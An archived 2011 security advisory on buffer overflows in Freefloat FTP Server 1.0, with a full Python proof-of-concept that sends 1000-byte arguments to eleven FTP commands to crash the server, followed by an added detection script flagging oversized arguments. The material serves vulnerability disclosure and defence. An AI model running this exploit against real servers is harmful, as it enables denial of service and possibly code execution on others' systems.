Freefloat FTP Server 1.0 Buffer Overflow

2011-08-05T00:00:00
ID PACKETSTORM:103746
Type packetstorm
Reporter Veerendra G.G
Modified 2011-08-05T00:00:00

Description

                                        
                                            `###############################################################################  
Freefloat FTP Server POST Auth Multiple Commands Buffer Overflow Vulnerabilities  
  
SecPod Technologies (www.secpod.com)  
Author: Veerendra G.G  
###############################################################################  
  
SecPod ID: 1019

19/07/2011 Issue Discovered
19/07/2011 Vendor Notified
No Response From Vendor
04/08/2011 Advisory Released
  
  
Class: Buffer Overflow
Severity: High
  
  
Overview:  
---------  
Freefloat FTP Server Version 1.0 is prone to buffer overflow vulnerabilities
in multiple commands.
  
  
Technical Description:  
----------------------  
The flaws are caused by input validation errors while processing the DELE,
MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE and STAT commands. They
can be exploited by sending an overly long command argument, causing the
buffer to overflow.
  
  
Impact:  
--------  
Successful exploitation may allow remote attackers to execute arbitrary code  
or cause a denial of service condition.  
  
  
Affected Software:  
------------------  
Freefloat FTP Server Version 1.0  
  
  
Tested on:  
-----------  
Freefloat FTP Server Version 1.0 on Windows XP SP3 En.  
  
  
References:  
-----------  
http://secpod.org/blog/?p=310  
http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py  
http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt  
http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php  
  
  
Proof of Concept:  
----------------  
http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py  
  
(or see below)  
  
  
  
Solution:  
----------  
Not available  
  
  
Risk Factor:  
-------------  
CVSS Score Report:   
ACCESS_VECTOR = NETWORK   
ACCESS_COMPLEXITY = LOW   
AUTHENTICATION = SINGLE INSTANCE   
CONFIDENTIALITY_IMPACT = PARTIAL   
INTEGRITY_IMPACT = PARTIAL   
AVAILABILITY_IMPACT = COMPLETE   
EXPLOITABILITY = PROOF_OF_CONCEPT   
REMEDIATION_LEVEL = UNAVAILABLE   
REPORT_CONFIDENCE = CONFIRMED   
CVSS Base Score = 8.0 (AV:N/AC:L/Au:SI/C:P/I:P/A:C)   
CVSS Temporal Score = 7.2   
Risk factor = High   
  
  
Credits:  
--------  
Veerendra G.G of SecPod Technologies has been credited with the discovery of  
this vulnerability.  
  
  
============================================================  
  
  
#!/usr/bin/python
##############################################################################
# Title : Freefloat FTP Server Multiple Buffer Overflow Vulnerabilities
# Author : Veerendra G.G from SecPod Technologies (www.secpod.com)
# Vendor : http://www.freefloat.com/sv/utilities-tools/utilities-tools.php
# Advisory : http://secpod.org/blog/?p=310
#            http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py
#            http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt
# Version : Freefloat FTP Server Version 1.0
# Date : 21/07/2011
##############################################################################

import sys, socket


def exploit(HOST, PORT, CMD):
    try:
        tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        tcp_sock.connect((HOST, PORT))
    except Exception, msg:
        print "[-] Not able to connect to : " , HOST
        sys.exit(0)

    res = tcp_sock.recv(1024)

    if "220 FreeFloat" not in res:
        print "[-] FreeFloat FTP Server Not Found..."
        tcp_sock.close()
        sys.exit(0)

    tcp_sock.send("USER test\r\n")
    tcp_sock.recv(1024)
    tcp_sock.send("PASS test\r\n")
    tcp_sock.recv(1024)

    tcp_sock.send(CMD + " "+ "A" * 1000 + "\r\n")
    tcp_sock.close()


if __name__ == "__main__":

    if len(sys.argv) < 2:
        print "\t[-] Usage: python exploit.py target_ip"
        print "\t[-] Example : python exploit.py 127.0.0.1"
        print "\t[-] Exiting..."
        sys.exit(0)

    HOST = sys.argv[1]
    PORT = 21

    ## Vulnerable Commands
    CMDs = ["DELE", "MDTM", "RETR", "RMD", "RNFR",
            "RNTO", "STOU", "STOR", "SIZE", "APPE", "STAT"]

    for CMD in CMDs:
        print "[+] Connecting with server..."
        exploit(HOST, PORT, CMD)
        print "[+] Exploit Sent with %s command..." %(CMD)
        print "[+] Checking Server Crashed or not..."

        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((HOST, PORT))
            s.close()
        except Exception, msg:
            print "[+] Server Crashed with %s Command" %(CMD)
            sys.exit(0)
  
`
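
Since the advisory lists no fix, one way to spot the condition in its Technical Description is to check a client's FTP control-channel traffic for the affected commands carrying oversized arguments. The sketch below is an added example, not part of the SecPod advisory or its PoC. The 255-byte limit, the function names and the sample stream are assumptions constructed for illustration.

```python
# Added example: flag oversized arguments to the commands named in the advisory.
AFFECTED = frozenset(["DELE", "MDTM", "RETR", "RMD", "RNFR", "RNTO",
                      "STOU", "STOR", "SIZE", "APPE", "STAT"])

# Assumption: 255 bytes is a generous ceiling for a legitimate path argument;
# the advisory only says "overly long" and its PoC sends 1000 bytes.
MAX_ARG_LEN = 255


def parse_commands(stream):
    """Yield (verb, argument) for each line of a client-to-server control stream."""
    for raw in stream.split(b"\n"):
        line = raw.rstrip(b"\r")
        if not line:
            continue
        verb, _, arg = line.partition(b" ")
        # FTP verbs are case-insensitive (RFC 959), so normalise before matching.
        yield verb.decode("ascii", "replace").upper(), arg


def find_oversized(stream, limit=MAX_ARG_LEN):
    """Return (verb, arg_len, after_pass) for affected commands over the limit."""
    alerts, after_pass = [], False
    for verb, arg in parse_commands(stream):
        if verb == "PASS":
            after_pass = True  # client attempted login; success is not visible here
        elif verb in AFFECTED and len(arg) > limit:
            alerts.append((verb, len(arg), after_pass))
    return alerts


# Constructed sample: one client's reassembled control-channel bytes.
SAMPLE = (b"USER test\r\nPASS test\r\n"
          b"SIZE readme.txt\r\n"          # affected verb, normal length
          b"CWD " + b"B" * 400 + b"\r\n"  # long, but not in the advisory's list
          b"STAT\r\n"                      # affected verb, no argument
          b"retr " + b"A" * 1000)          # lowercase verb, capture cut before CRLF

if __name__ == "__main__":
    for verb, size, authed in find_oversized(SAMPLE):
        print("ALERT %s argument of %d bytes (after PASS: %s)" % (verb, size, authed))
```

The same length check can be enforced inline by an FTP-aware proxy placed in front of the server, rejecting the command instead of only alerting on it.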